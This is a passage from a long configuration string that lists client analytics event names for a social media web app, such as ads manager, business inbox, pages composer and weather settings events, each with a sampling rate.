iew_amadpreviewstart_augl:1,adsadpreview_coreappexperience_augl:1,adsadpreview_coreappexperienceended_augl:1,adsadpreview_coreuserinteraction_augl:1,adsadpreview_coreuserinteractionended_augl:1,adscometflytrap_afcometselectadscategory_augl:1,adscometflytrap_afcometselectproduct_augl:1,adscometflytrap_coreappexperience_augl:1,adscometflytrap_coreappexperienceended_augl:1,adscometflytrap_coreinteractionbutton_augl:1,adscometflytrap_coreinteractiontextinput_augl:1,adscometflytrap_coreinteractiontextinputended_augl:1,adscometflytrap_coreuserinteraction_augl:1,adscometflytrap_coreuserinteractionended_augl:1,adsflytrap_afsendfeedback_augl:1,adsflytrap_coreappexperience_augl:1,adsflytrap_coreappexperienceended_augl:1,adsflytrap_coreinteractionbutton_augl:1,adsflytrap_coreinteractiondropdown_augl:1,adsflytrap_coreinteractiondropdownended_augl:1,adsflytrap_coreinteractiontextinput_augl:1,adsflytrap_coreinteractiontextinputended_augl:1,adsflytrap_coreuserinteraction_augl:1,adsflytrap_coreuserinteractionended_augl:1,adsflytrap_coreviewmodal_augl:1,adsflytrap_coreviewmodalended_augl:1,adsmanager_amaccountoverview_augl:1,adsmanager_amaccountoverviewended_augl:1,adsmanager_amadbuilderimportflowmockupconfirmed_augl:1,adsmanager_amadbuilderimportflowmockupselected_augl:1,adsmanager_amadbuilderimportflowstarted_augl:1,adsmanager_amadobjectcreateflow_augl:1,adsmanager_amadobjectcreateflowended_augl:1,adsmanager_amadobjectduplicateflow_augl:1,adsmanager_amadobjectduplicateflowended_augl:1,adsmanager_amadobjecteditflow_augl:1,adsmanager_amadobjecteditflowended_augl:1,adsmanager_amadobjectexportflow_augl:1,adsmanager_amadobjectexportflowended_augl:1,adsmanager_amadobjectimportflow_augl:1,adsmanager_amadobjectimportflowended_augl:1,adsmanager_amadobjectreviewandpublishflow_augl:1,adsmanager_amadobjectreviewandpublishflowended_augl:1,adsmanager_amadobjectsetbuyingtype_augl:1,adsmanager_amadobjectsetobjective_augl:1,adsmanager_amadscopyerror_augl:1,adsmanager_amapierror_augl:1,adsmanager_amautonamingclicktosave_augl:1,adsmanager_ambackgrounderaserdialogclose_augl:1,adsmanager_amblockingvalidationerror_augl:1,adsmanager_amconvergencecontextualmenuclick_augl:1,adsmanager_amconvergenceexternalcreationdialogclick_augl:1,adsmanager_amconvergencefocusmode_augl:1,adsmanager_amconvergencefocusmodeended_augl:1,adsmanager_amconvergencefocusmodetoggleclick_augl:1,adsmanager_amconvergenceoptinoptout_augl:1,adsmanager_amconvergencepublishflow_augl:1,adsmanager_amconvergencepublishflowended_augl:1,adsmanager_amconvergencepublishpreviewdialogselection_augl:1,adsmanager_amcrash_augl:1,adsmanager_amcreateflow_augl:1,adsmanager_amcreateflowended_augl:1,adsmanager_amcreateflowfocusframework_augl:1,adsmanager_amcreateflowfocusframeworkclicktoedit_augl:1,adsmanager_amcreateflowfocusframeworkended_augl:1,adsmanager_amcreateflowmutableoption_augl:1,adsmanager_amcreateflowpage_augl:1,adsmanager_amcreateflowpageended_augl:1,adsmanager_amcriticalexception_augl:1,adsmanager_amdraftfragmentloaderror_augl:1,adsmanager_amdraftloaderror_augl:1,adsmanager_ameditflow_augl:1,adsmanager_ameditflowended_augl:1,adsmanager_amemojiclicktoedit_augl:1,adsmanager_amemojiselectedemoji_augl:1,adsmanager_amexception_augl:1,adsmanager_amfatalerror_augl:1,adsmanager_amhomeview_augl:1,adsmanager_amhomeviewended_augl:1,adsmanager_amimporterror_augl:1,adsmanager_aminit_augl:1,adsmanager_aminstantcheckoutdropdown_augl:1,adsmanager_aminstantcheckoutsection_augl:1,adsmanager_aminstantcheckoutsectionended_augl:1,adsmanager_amnamingtypeaheadselect_augl:1,adsmanager_ampublisherror_augl:1,adsmanager_amsmartbackgrounddialog_augl:1,adsmanager_amsmartbackgrounddialogclosed_augl:1,adsmanager_amsmartbackgrounderror_augl:1,adsmanager_amsmartbackgroundimagesave_augl:1,adsmanager_amtableadobject_augl:1,adsmanager_amtableadobjectended_augl:1,adsmanager_amurltypeahead_augl:1,adsmanager_amvalidationerror_augl:1,adsmanager_coreappexperience_augl:1,adsmanager_coreappexperienceended_augl:1,adsmanager_coreinteractiontoggle_augl:1,adsmanager_coreuserinteraction_augl:1,adsmanager_coreuserinteractionended_augl:1,adswaittimespinners_awtspinners_augl:1,adswaittimespinners_coreappexperience_augl:1,adswaittimespinners_coreappexperienceended_augl:1,adswaittimespinners_coreuserinteraction_augl:1,adswaittimespinners_coreuserinteractionended_augl:1,al_dialog_shown:1,altpay2_ui_event:1,auglexplorer_augleupdatefilter_augl:1,auglexplorer_coreappexperience_augl:1,auglexplorer_coreappexperienceended_augl:1,auglexplorer_coreuserinteraction_augl:1,auglexplorer_coreuserinteractionended_augl:1,bd_mobile_signals:1,bd_pdc_signals:1,bic_engagement_event:1,bic_entry_point_events:1,billing1_workplace_event:1,billing_interface_debug:1,billing_interface_error:1,billing_interface_event:1,billing_interface_surface_debug:1,billing_interface_surface_error:1,billing_interface_surface_event:1,biz_core_log_out_click:1,biz_core_more_tools_item_click:1,biz_core_more_tools_item_impression:1,biz_core_nav_bar_hover:1,biz_core_notification_item_click:1,biz_core_notification_item_impression:1,biz_core_notifications_impression:1,biz_core_overlay_item_enter_flow:1,biz_core_overlay_item_exit_flow:1,biz_core_overlay_item_impression:1,biz_core_presence_switcher_click:1,biz_core_presence_switcher_enter_flow:1,biz_core_presence_switcher_exit_flow:1,biz_core_presence_switcher_render_view:1,biz_core_presence_switcher_update_value:1,biz_core_tab_item_click:1,biz_core_tab_item_enter_flow:1,biz_core_tab_item_exit_flow:1,biz_core_tab_item_impression:1,biz_core_tool_outcome:1,biz_home_tab_ads_card_click:1,biz_home_tab_ads_card_impression:1,biz_home_tab_alerts_card_click:1,biz_home_tab_alerts_card_dismiss:1,biz_home_tab_alerts_card_impression:1,biz_home_tab_entry_point_click:1,biz_home_tab_entry_point_impression:1,biz_home_tab_home_header_impression:1,biz_home_tab_insights_card_click:1,biz_home_tab_insights_card_impression:1,biz_home_tab_posts_card_click:1,biz_home_tab_posts_card_impression:1,biz_home_tab_updates_card_click:1,biz_home_tab_updates_card_impression:1,bizapp_tool_outcome:1,blood_donation_partner_client_event:1,bop_ui_event:1,business_composer_composer_cancel_flow:1,business_composer_composer_enter_flow:1,business_composer_composer_submit_flow:1,business_composer_composer_submit_flow_failure:1,business_composer_composer_submit_flow_success:1,business_composer_composer_upload:1,business_composer_composer_upload_failure:1,business_composer_composer_upload_success:1,business_composer_page_business_composer_switch_button_click:1,business_composer_typeahead_search_click:1,business_inbox_bulk_admin_assignment_action_click:1,business_inbox_bulk_admin_assignment_dialog_submit:1,business_inbox_bulk_delete_action_click:1,business_inbox_bulk_delete_dialog_submit:1,business_inbox_bulk_label_action_click:1,business_inbox_bulk_label_dialog_submit:1,business_inbox_bulk_mark_as_unread_action_click:1,business_inbox_bulk_move_to_folder_action_click:1,business_inbox_bulk_reply_action_click:1,business_inbox_bulk_reply_dialog_submit:1,business_inbox_content_search_click:1,business_inbox_content_search_result_click:1,business_inbox_content_search_result_render_view:1,business_inbox_label_search_click:1,business_inbox_label_search_result_click:1,business_inbox_label_search_result_render_view:1,business_inbox_mark_all_comments_read_click:1,business_inbox_message_list_render_view:1,business_inbox_message_send_request:1,business_inbox_multi_admin_assignment_update:1,business_inbox_nux_cancel_flow:1,business_inbox_nux_impression:1,business_inbox_people_search_click:1,business_inbox_people_search_result_click:1,business_inbox_people_search_result_render_view:1,business_inbox_platform_click:1,business_inbox_post_folder_update:1,business_inbox_saved_reply_send_response:1,business_inbox_search_cancel_click:1,business_inbox_search_focus_click:1,business_inbox_search_result_render_view:1,business_inbox_suggested_label_click:1,business_inbox_suggested_label_impression:1,business_inbox_suggested_label_render_view:1,business_inbox_switch_folder_click:1,business_inbox_thread_checkbox_click:1,business_inbox_thread_checkbox_impression:1,business_inbox_thread_checkbox_update_value:1,business_inbox_thread_folder_update:1,business_inbox_thread_list_render_view:1,businessmanager_bmassetinfoextraaction_augl:1,businessmanager_bmassetpermissionaccordianmenuinteraction_augl:1,businessmanager_bmassetpermissiondelete_augl:1,businessmanager_bmassetpermissiondeletecancel_augl:1,businessmanager_bmassetpermissiondeleteconfirm_augl:1,businessmanager_bmassetpermissionedit_augl:1,businessmanager_bmassettabaddasset_augl:1,businessmanager_bmassettabaddpeople_augl:1,businessmanager_bmassettabassignpartner_augl:1,businessmanager_bmchangetabinteraction_augl:1,businessmanager_bmlistrowimpression_augl:1,businessmanager_bmlistviewinteraction_augl:1,businessmanager_bmlistviewtoggle_augl:1,businessmanager_bmnavigationlevel_augl:1,businessmanager_bmnavigationlevelended_augl:1,businessmanager_bmopenassetintoolaction_augl:1,businessmanager_bmpaneload_augl:1,businessmanager_bmpaneloadended_augl:1,businessmanager_bmpaneopen_augl:1,businessmanager_bmpaneopenended_augl:1,businessmanager_bmserverexception_augl:1,businessmanager_bmusertabaddasset_augl:1,businessmanager_bmvalidationerror_augl:1,businessmanager_bmvettingpageinitialload_augl:1,businessmanager_bmvettingpageinitialloadended_augl:1,businessmanager_coreappexperience_augl:1,businessmanager_coreappexperienceended_augl:1,businessmanager_coreinteractionaccordianmenu_augl:1,businessmanager_coreinteractionbutton_augl:1,businessmanager_coreinteractioncheckbox_augl:1,businessmanager_coreinteractiondropdown_augl:1,businessmanager_coreinteractiondropdownended_augl:1,businessmanager_coreinteractionradiobutton_augl:1,businessmanager_coreinteractiontextinput_augl:1,businessmanager_coreinteractiontextinputended_augl:1,businessmanager_coreinteractiontoggle_augl:1,businessmanager_coreuserinteraction_augl:1,businessmanager_coreuserinteractionended_augl:1,businessmanager_coreviewmodal_augl:1,businessmanager_coreviewmodalended_augl:1,candidate_portal_give_feedback:1,candidate_portal_product_logging:1,category_feed_first_page_fetched:1,change_beneficiary:1,chatroom_attachment_chat_button_tapped:1,chatroom_join_request_cancelled:1,chatroom_join_request_submitted:1,chatroom_story_vpv:1,civic_action_log_event:1,cix_account_status_vpvd:1,cix_warning_screens:1,cloud_gaming_events:1,cloud_gaming_session_event:1,cloud_gaming_webrtc_stats:1,comet_feed_story_menu_action:1,comet_feed_vpvd_test:1000,comet_group_mall_page_visit:1,comet_media_options_click:1,comet_media_remove_tag:1,comet_media_tag:1,comet_media_vpvd:1,comet_news_feed_eof:1,comet_news_feed_eof_unmounted:1,comet_news_feed_loaded:1,comet_notifications_ranking_error:1,comet_opt_in_upsell_interaction:1,comet_opt_out_survey:1,comet_opt_out_survey_feedback:1,comet_page_post_edit:1,comet_scroll_latency:10000,comet_story_attachments:1,comet_topnav_item_click:1,comet_topnav_item_impression:1,comment_inline_seen:1,comment_inline_xout:1,comment_ordering_mode:1,commerce_experimental_component_click:1,commerce_feed_story_click:1,commerce_feed_story_impression:1,commerce_manager_client:1,commerce_pdp_product_tag_click:1,commerce_post_outbound_click:1,commerce_product_tag_alert_click:1,commerce_product_tag_alert_dismiss:1,commerce_product_tag_alert_impression:1,commerce_product_tag_dot_click:1,commerce_product_tag_dot_imp:1,commerce_product_tag_media_click:1,commerce_see_more_from_shop_card_click:1,commerce_shop_landing:1,commerce_shop_product_card_vpv:1,commerce_shop_product_details_imp:1,commerce_shoppable_content_landing_scroll:1,commerce_view_product_tag:1,commerce_view_product_tag_hscroll:1,commerce_view_product_tag_overlapped:1,commerce_view_product_tag_pill:1,commerce_view_product_tag_pill_dwelled:1,commerce_view_product_tag_post:1,commerce_view_product_tag_product:1,commerce_view_product_tagged_post:1,commerce_view_see_more_from_shop:1,commerce_view_shoppable_collection_landing:1,commerce_view_shoppable_content_landing:1,community_moderation_event:1,community_resources_click_link_mobile:1,community_resources_share_link_mobile:1,confirm_fundraiser_match_view_interstitial:1,consent_flow_interactions:1,content_manager_confirmation_dialog_click:1,content_manager_content_detail_view_cancel_flow:1,content_manager_content_detail_view_click:1,content_manager_content_detail_view_enter_flow:1,content_manager_content_detail_view_exit_flow:1,content_manager_content_detail_view_receive_response_failure:1,content_manager_content_detail_view_receive_response_success:1,content_manager_content_detail_view_send_request:1,content_manager_content_item_click:1,content_manager_content_item_impression:1,content_manager_filter_selector_click:1,content_manager_filter_selector_impression:1,content_manager_filter_selector_update_value:1,content_manager_tab_item_click:1,content_manager_tab_item_impression:1,content_manager_typeahead_submit:1,content_manager_view_switcher_tab_click:1,content_manager_view_switcher_tab_enter_flow:1,content_manager_workspace_click:1,content_manager_workspace_enter_flow:1,content_manager_workspace_exit_flow:1,content_manager_workspace_impression:1,content_manager_workspace_receive_response_failure:1,content_manager_workspace_receive_response_success:1,content_manager_workspace_send_request:1,copy_nonprofit_fundraiser_creation_short_url:1,coworker_opt_out_flow:1,create_fundraiser_begin:1,create_fundraiser_match_view_interstitial:1,create_fundraiser_profile_frame_begin:1,create_fundraiser_profile_frame_complete:1,create_living_room_action_link_impression:1,crisis_view_module:1,crowdsourcing_session:1,deferred_feedback_experience:1,delete_media_attempted:1,e2e_deletion_requests:1,enterpriseevents_coreappexperience_augl:1,enterpriseevents_coreappexperienceended_augl:1,enterpriseevents_coreinteractionbutton_augl:1,enterpriseevents_coreuserinteraction_augl:1,enterpriseevents_coreuserinteractionended_augl:1,events_transparency_history_details_view:1,external_metric_consumption_validation_event:1,external_share_tracking_event:1,facebook_partner_program:1,faq_view_answer:1,fbt_impressions_batch:1,feature_limited:1,filter_page_fundraisers_tab:1,flx_dialog_shown:1,flx_feature_limited:1,friends_center_opened:1,frtp_survey_response:1,fundraiser_add_organizers:1,fundraiser_match_delete_begin:1,fundraiser_match_delete_complete:1,fundraiser_match_review_view_interstitial:1,gaming_arena:1,gaming_video_level_up_qp:1,goodwill_product_system_share_menu_open:1,gpymi_feed_unit:1,griffin_tab_open:1,group_leaders_engagement:1,group_visit_action:1,groups_mall_activation_pymi:1,holy_diver_client_request:1,ias_uts_client_debugging:1,instant_games_interactive_poll_event:1,instant_games_shareable_link_event:1,instant_games_tournaments_events:1,kototoro_comment_create_attempted:1,kototoro_comment_created:1,kototoro_comment_delete_attempted:1,kototoro_comment_deleted:1,kototoro_comment_emoji_selected:1,kototoro_comment_exited:1,kototoro_comment_follow_upsell_action:1,kototoro_comment_follow_upsell_shown:1,kototoro_comment_launched:1,kototoro_comment_liked:1,kototoro_comment_mention_selected_user:1,kototoro_comment_mention_view_canceled:1,kototoro_comment_mention_view_shown:1,kototoro_comment_unliked:1,kttr_fb_stories_button_click:1,kttr_fb_stories_button_exposure:1,kttr_fb_stories_upsell:1,kttr_ig_feed_crosspost_composer:1,kttr_ig_feed_crosspost_sharesheet:1,kttr_ig_stories_crosspost_composer:1,kttr_ig_stories_crosspost_sharesheet:1,kttr_share_to_feed_error:1,kttr_share_to_story_error:1,kttr_shared_link:1,labnet_event:1,laminardevtools_coreappexperience_augl:1,laminardevtools_coreappexperienceended_augl:1,laminardevtools_coreuserinteraction_augl:1,laminardevtools_coreuserinteractionended_augl:1,laminardevtools_ldtactionselected_augl:1,laminardevtools_ldtdispatchinfoviewchange_augl:1,laminardevtools_ldtinit_augl:1,laminardevtools_ldtsearchfilter_augl:1,laminardevtools_ldttabchange_augl:1,lasso_composer_fb_stories_toggle:1,lasso_composer_fb_timeline_toggle:1,lasso_composer_fb_toggle:1,lasso_composer_ig_feed_toggle:1,lasso_composer_ig_stories_toggle:1,launch_message_seller_dialog:1,ldp_touchpoint_logger:10000,leads_center_audience_expansion_click:1,leads_center_audience_expansion_create:1,leads_center_audience_expansion_failure:1,leads_center_audience_expansion_impression:1,leads_center_audience_expansion_submit:1,leads_center_crm_stage_submit_flow:1,leads_center_csv_import_cancel_flow:1,leads_center_csv_import_click:1,leads_center_csv_import_submit_flow:1,leads_center_csv_import_submit_flow_failure:1,leads_center_csv_import_upload:1,leads_center_csv_import_upload_failure:1,leads_center_csv_import_upload_success:1,leads_center_email_setting_submit_flow:1,leads_center_email_tab_impression:1,leads_center_email_thread_list_click:1,leads_center_email_tool_auto_reply_impression:1,leads_center_email_tool_auto_reply_submit_flow:1,leads_center_email_tool_auto_reply_submit_flow_cancel:1,leads_center_email_tool_auto_reply_submit_flow_failure:1,leads_center_email_tool_auto_reply_submit_flow_success:1,leads_center_email_tool_business_send_email_click:1,leads_center_email_tool_business_send_email_impression:1,leads_center_email_tool_business_send_email_submit_flow:1,leads_center_email_tool_business_send_email_submit_flow_cancel:1,leads_center_email_tool_business_send_email_submit_flow_failure:1,leads_center_email_tool_business_send_email_submit_flow_success:1,leads_center_email_tool_confirmation_impression:1,leads_center_email_tool_confirmation_submit:1,leads_center_email_tool_confirmation_submit_flow_cancel:1,leads_center_email_tool_confirmation_submit_flow_failure:1,leads_center_email_tool_confirmation_submit_flow_success:1,leads_center_email_tool_scheduled_email_click:1,leads_center_email_tool_scheduled_email_impression:1,leads_center_email_tool_scheduled_email_submit:1,leads_center_email_tool_scheduled_email_submit_flow_cancel:1,leads_center_email_tool_scheduled_email_submit_flow_failure:1,leads_center_email_tool_scheduled_email_submit_flow_success:1,leads_center_filter_cancel_flow:1,leads_center_filter_create:1,leads_center_filter_delete:1,leads_center_filter_send_request:1,leads_center_filter_update:1,leads_center_in_surface_notification_click:1,leads_center_in_surface_notification_dismiss:1,leads_center_label_click:1,leads_center_label_submit_flow:1,leads_center_label_submit_flow_failure:1,leads_center_lead_click:1,leads_center_lead_list_impression:1,leads_center_lead_list_receive_response:1,leads_center_lead_list_receive_response_failure:1,leads_center_lead_list_send_request:1,leads_center_note_submit_flow:1,leads_center_note_submit_flow_failure:1,leads_center_reminder_submit_flow:1,leads_center_reminder_submit_flow_failure:1,leads_center_saved_audience_click:1,leads_center_saved_audience_dismiss:1,leads_center_saved_audience_failure:1,leads_center_saved_audience_impression:1,leads_center_saved_audience_send_request:1,leads_center_tos_dismiss:1,leads_center_tos_enter_flow:1,leads_center_tos_exit_flow:1,leads_center_tos_impression:1,leads_center_tos_submit_flow:1,learning_click_component:1,learning_exception:1,learning_view_component:1,lh_digest_logging:1,live_join_group_cta_click:1,live_trace_www:1,live_trace_www_video_player:1,locationmanager_coreappexperience_augl:1,locationmanager_coreappexperienceended_augl:1,locationmanager_coreinteractionaccordianmenu_augl:1,locationmanager_coreinteractionbutton_augl:1,locationmanager_coreinteractioncheckbox_augl:1,locationmanager_coreinteractiondropdown_augl:1,locationmanager_coreinteractiondropdownended_augl:1,locationmanager_coreinteractionradiobutton_augl:1,locationmanager_coreinteractiontextinput_augl:1,locationmanager_coreinteractiontextinputended_augl:1,locationmanager_coreinteractiontoggle_augl:1,locationmanager_coreuserinteraction_augl:1,locationmanager_coreuserinteractionended_augl:1,locationmanager_coreviewmodal_augl:1,locationmanager_coreviewmodalended_augl:1,log_comet_canvas_app_time_spent:1,log_messenger_frx_events_in_cix_screen:1,ls_business_welcome_page_composer_hided:1,ls_business_welcome_page_get_started_button_tapped:1,ls_business_welcome_page_start:1,ls_cta_click_client_handling_success:1,ls_cta_displayed_button_tapped:1,ls_did_tap_call_to_action:1,ls_messenger_integrity_block_facebook_confirmed:1,ls_messenger_integrity_block_facebook_failed:1,ls_messenger_integrity_block_facebook_succeeded:1,ls_messenger_integrity_block_facebook_tapped:1,ls_messenger_integrity_block_messages_confirmed:1,ls_messenger_integrity_block_messages_failed:1,ls_messenger_integrity_block_messages_succeeded:1,ls_messenger_integrity_block_messages_tapped:1,ls_messenger_integrity_block_view_enter:1,ls_messenger_integrity_learn_more_tapped:1,ls_messenger_integrity_unblock_facebook_confirmed:1,ls_messenger_integrity_unblock_facebook_failed:1,ls_messenger_integrity_unblock_facebook_succeeded:1,ls_messenger_integrity_unblock_facebook_tapped:1,ls_messenger_integrity_unblock_messages_confirmed:1,ls_messenger_integrity_unblock_messages_failed:1,ls_messenger_integrity_unblock_messages_succeeded:1,ls_messenger_integrity_unblock_messages_tapped:1,ls_persistent_menu_client_handling_success:1,ls_persistent_menu_icon_tapped:1,ls_persistent_menu_is_set_up:1,ls_rtc_end_call_survey:1,ls_rtc_star_rating:1,managedlift_coreappexperience_augl:1,managedlift_coreappexperienceended_augl:1,managedlift_coreinteractionbutton_augl:1,managedlift_coreinteractioncheckbox_augl:1,managedlift_coreinteractioncollapse_augl:1,managedlift_coreinteractionexpand_augl:1,managedlift_coreinteractionmouseover_augl:1,managedlift_coreinteractionmouseoverended_augl:1,managedlift_coreinteractionpanetab_augl:1,managedlift_coreinteractionradiobutton_augl:1,managedlift_coreinteractionsearchbar_augl:1,managedlift_coreinteractionsearchbarended_augl:1,managedlift_coreuserinteraction_augl:1,managedlift_coreuserinteractionended_augl:1,managedlift_coreviewmodal_augl:1,managedlift_coreviewmodalended_augl:1,managedlift_mlapierror_augl:1,managedlift_mlerror_augl:1,managedlift_mlfieldset_augl:1,managedlift_mlsurveyrespond_augl:1,managedlift_mltypeaheadselect_augl:1,managedlift_mlvalidationerror_augl:1,marketplace_pdp_tracking_data_tracker:1,media_cancelled_post_flow:1,media_failed_post_flow:1,media_finished_post_flow:1,media_started_post_flow:1,member_accepted_hcp_historical_content_dialog:1,member_accepted_hcp_message_request:1,member_clicked_hcp_message_profile_button:1,member_clicked_hcp_reply_in_messenger:1,member_continued_hcp_ed_bottom_sheet:1,member_continued_hcp_ed_interstitial:1,member_continued_hcp_messaging_warning:1,member_exited_hcp_ed_interstitial:1,member_exited_hcp_historical_content_dialog:1,member_rejected_hcp_message_request:1,member_saw_hcp_accepted_message:1,member_saw_hcp_ed_bottom_sheet:1,member_saw_hcp_ed_interstitial:1,member_saw_hcp_historical_content_dialog:1,member_saw_hcp_message_request:1,member_saw_hcp_message_request_composer:1,member_saw_hcp_messaging_warning:1,member_sent_hcp_message_request:1,member_typed_hcp_message_request_composer:1,mentorship:1,mentorship_cohort:1,mentorship_user:1,messenger_ads_link_click:1,messenger_ads_link_click_cta:1,messenger_ads_message_seen_inbox:1,messenger_ads_message_seen_thread:1,messenger_business_composer_click:1,messenger_business_composer_impression:1,messenger_business_faq_setting_add_question_button_click:1,messenger_business_faq_setting_delete_question_button_click:1,messenger_business_faq_setting_entry_click:1,messenger_business_faq_setting_save_question_button_click:1,messenger_business_faq_setting_turn_on_or_off_messenger_button_click:1,messenger_business_faq_tip_click:1,messenger_business_inbox_action_menu_button_click:1,messenger_business_inbox_action_menu_click:1,messenger_business_inbox_action_menu_impression:1,messenger_business_menu_click:1,messenger_business_menu_impression:1,messenger_business_message_send_request:1,messenger_business_profile_badge_impression:1,messenger_business_thread_click:1,messenger_business_thread_update_value:1,messenger_business_threadview_impression:1,messenger_desktop_promo:1,messenger_integrity_block_facebook_tapped:1,messenger_integrity_unblock_facebook_tapped:1,misinfo_frontend:1,mk_client_event:1,mqtt_unified_client_connect:1000,mqtt_unified_client_disconnect:1000,mqtt_unified_client_incoming_publish:1000,mqtt_unified_client_outgoing_publish:1000,news_digest_content_impression_event:1,news_digest_outbound_click_event:1,news_digest_primary_click_event:1,news_digest_secondary_click_event:1,news_digest_unit_impression_event:1,notif_list_bottom_collision:10000,offer_notifications:10000,onevc_camera_video_quality_limitation:1,open_seen_summary:1,overlays_tos_accept:1,page_admin_replied:1,page_family_of_apps_link:1,page_insights_mobile_exception:1,page_private_reply_action_flow:1,page_whatsapp_linking_syncing:1,pages_composer_composer_cancel_flow:1,pages_composer_composer_enter_flow:1,pages_composer_composer_focus_acquired:1,pages_composer_composer_focus_lost:1,pages_composer_composer_impression:1,pages_composer_composer_submit_flow:1,pages_composer_composer_submit_flow_failure:1,pages_composer_composer_submit_flow_success:1,pages_composer_consolidated_entry_click:1,pages_composer_draft_post_cancel_flow:1,pages_composer_draft_post_edit_enter_flow:1,pages_composer_draft_post_edit_submit_flow:1,pages_composer_draft_post_enter_flow:1,pages_composer_draft_post_submit_flow:1,pages_composer_draft_reminder_card_impression:1,pages_composer_draft_reminder_unit_impression:1,pages_composer_footer_setting_button_click:1,pages_composer_media_attachment_button_click:1,pages_composer_media_attachment_button_impression:1,pages_composer_offer_composer_cancel_flow:1,pages_composer_offer_composer_enter_flow:1,pages_composer_offer_composer_photo_uploader_submit_flow:1,pages_composer_offer_composer_photo_uploader_submit_flow_failure:1,pages_composer_offer_composer_photo_uploader_submit_flow_success:1,pages_composer_offer_composer_submit_flow:1,pages_composer_offer_composer_submit_flow_failure:1,pages_composer_offer_composer_submit_flow_success:1,pages_composer_offer_composer_update_value:1,pages_composer_preview_button_click:1,pages_composer_schedule_post_cancel_flow:1,pages_composer_schedule_post_enter_flow:1,pages_composer_schedule_post_submit_flow:1,pages_inbox_impression:1,pages_launchpoint_pages_you_manage_click:1,pages_launchpoint_view_message_click:1,pages_launchpoint_view_notification_click:1,pages_message_thread_impression:1,pages_page_action_click:1,pages_page_action_impression:1,pages_page_address_click:1,pages_page_card_impression:1,pages_page_card_see_all_click:1,pages_page_cover_click:1,pages_page_cover_impression:1,pages_page_email_click:1,pages_page_get_directions_click:1,pages_page_like_chaining_unit_impression:1,pages_page_map_click:1,pages_page_message_click:1,pages_page_notification_menu_impression:1,pages_page_photo_album_click:1,pages_page_photo_click:1,pages_page_settings_impression:1,pages_page_surface_impression:1,pages_page_video_click:1,pages_page_website_click:1,pages_permalink_impression:1,partner_home_enforcement_table_impression:1,partner_home_lookup_asset:1,partner_home_view_partner:1,partner_home_work_chat_clicked:1,people_you_may_follow:1,perf:1,pii_action_flow:1,play_inline_media:1,political_ads_infosheet:1,post_debugger_usage:1,prim_action_flow:1,privacy_checkup_event:1,product_tag_post_click:1,profile_plus_insights_events:1,pyma_click:1,pyma_impression:1,qp_action:1,qp_client_logs:1,qp_impression:1,regular_pymk_add:1,regular_pymk_imp:1,regular_pymk_profile:1,regular_pymk_xout:1,room_app_switch_tap:1,room_card_impression:1,room_card_tap:1,room_create_tap:1,room_create_update_failure:1,room_creation_flow_start:1,room_dismiss_sheet:1,room_end_tap:1,room_group_room_list_view_impression:1,room_group_room_list_view_item_tap:1,room_group_room_rhc_impression:1,room_interest_tap:1,room_join_tap:1,room_management_sheet_impression:1,room_promotion_unit_impression:1,room_promotion_unit_tap:1,room_regen_link_tap:1,room_self_card_button_tap:1,room_setting_sheet_impression:1,room_share_sheet_impression:1,room_share_tap:1,room_skip_tap:1,room_tray_impression:1,room_update_tap:1,save_click:1,save_item_impression:1,save_surface_impression:1,saved_dashboard_imp:1,saved_dashboard_list_landing_imp:1,saved_see_all_lists_view_imp:1,sc_audio_messages_event:1,search_result_page_logging_inline_action:1,search_result_page_logging_item_clicked:1,search_result_page_logging_results_loaded:1,search_result_page_logging_viewport_view:1,search_results_logging_module_unit_data:1,search_results_logging_result_unit_data:1,search_typeahead_logging_session:1,services_consumer_client_side_events:1,services_local_business_online_events_falco_event:1,sextortion_victim_support_option_clicked:1,share_dialog_unified_composer:1,share_nonprofit_post:1,shift_cover_coverage_button_clicked:1,shift_cover_detail_screen_opened:1,shift_cover_message_button_clicked:1,sims_map_node:1,sims_search:1,sims_ui_event:1,sims_vm_command:1,smart_compose_candidates_generated:1,smart_compose_candidates_queried:1,smart_compose_matching_suggestion:1,smart_compose_suggestion_clicked:1,smart_compose_suggestion_displayed:1,smart_keyboard_suggestion_displayed:1,story_media_view:1,streaming_sdk_event:1,streaming_sdk_metadata:1,streaming_sdk_session_summary:1,support_reaction_interstitial_impression:1,support_reaction_interstitial_okay_pressed:1,talent_scout_click:1,talent_scout_impression:1,tap_add_to_pages_story:1,tap_nonprofit_post:1,tap_select_page:1,ufi_share_menu_copy_link:1,ufix_ixt_trigger:1,ui_feature_confirmation_confirm:1,ui_feature_confirmation_dismiss:1,ui_feature_confirmation_failure_actionable:1,ui_feature_confirmation_failure_actionable_dismiss:1,ui_feature_confirmation_failure_unactionable:1,ui_feature_confirmation_ig_login_failure:1,ui_feature_confirmation_ig_login_start:1,ui_feature_confirmation_ig_login_success:1,ui_feature_confirmation_start:1,ui_feature_confirmation_success:1,ui_feature_confirmation_try_again:1,ui_feature_permission_disclosure_alert_click:1,ui_feature_permission_disclosure_alert_start:1,unidash_bladerunner_events:1,unified_interception_intercept_accept:1,unified_interception_intercept_create:1,unified_interception_intercept_reject:1,unified_interception_intercept_undo:1,vehicle_entity_page_user_action_event:1,verse:1,video_action_source_event:1,video_search_relevancy_feedback:1,view_beneficiary_selector:1,view_create_outro_dialog:1,view_fundraiser:1,vod_pnc_messenger_cta_click:1,vod_pnc_people_sheet_impression:1,vod_pnc_people_sheet_thumbnail_impression:1,vod_pnc_see_all_reactions_click:1,volunteering_click_unit:1,volunteering_view_page:1,volunteering_view_unit:1,voter_registration_attachment_tap_change_state:1,voter_registration_post_impression:1,voter_registration_post_tap_register:1,voter_registration_qp_tap_edit_location:1,voter_registration_state_selector_tap_state:1,wayfinder_mapbox_data_load:1,weather_bookmark_forecast_scrolled:1,weather_bookmark_impression:1,weather_bookmark_scroll_forecast:1,weather_bookmark_settings_tapped:1,weather_bookmark_tap_city_tab:1,weather_bookmark_tap_future_day:1,weather_bookmark_tap_hourly_forecast:1,weather_bookmark_tap_nowcast:1,weather_daily_notifications_mutation_error:1,weather_daily_notifications_turned_off:1,weather_daily_notifications_turned_on:1,weather_live_alerts_mutation_error:1,weather_live_alerts_turned_off:1,weather_live_alerts_turned_on:1,weather_settings_add_city:1,weather_settings_daily_notification_use_current_location:1,weather_settings_delete_city:1,weather_settings_error_state_dismissed:1,weather_settings_error_state_fixed:1,weather_settings_impression:1,weather_settings_notification_location_tapped:1,weather_settings_tap_city_row:1,weather_settings_temperature_unit_changed:1,webauthn_authenticator_login_failure:1,webauthn_authenticator_login_success:1,webauthn_authenticator_register_failure:1,webauthn_authenticator_register_success:1,work_safety_client_error:1,work_thanks_mobile_ui_confirm_button_clicked:1,work_thanks_mobile_ui_dialog_opened:1,www_comet_video_autoplay:10000,ads_manager_ad_appeal_send_f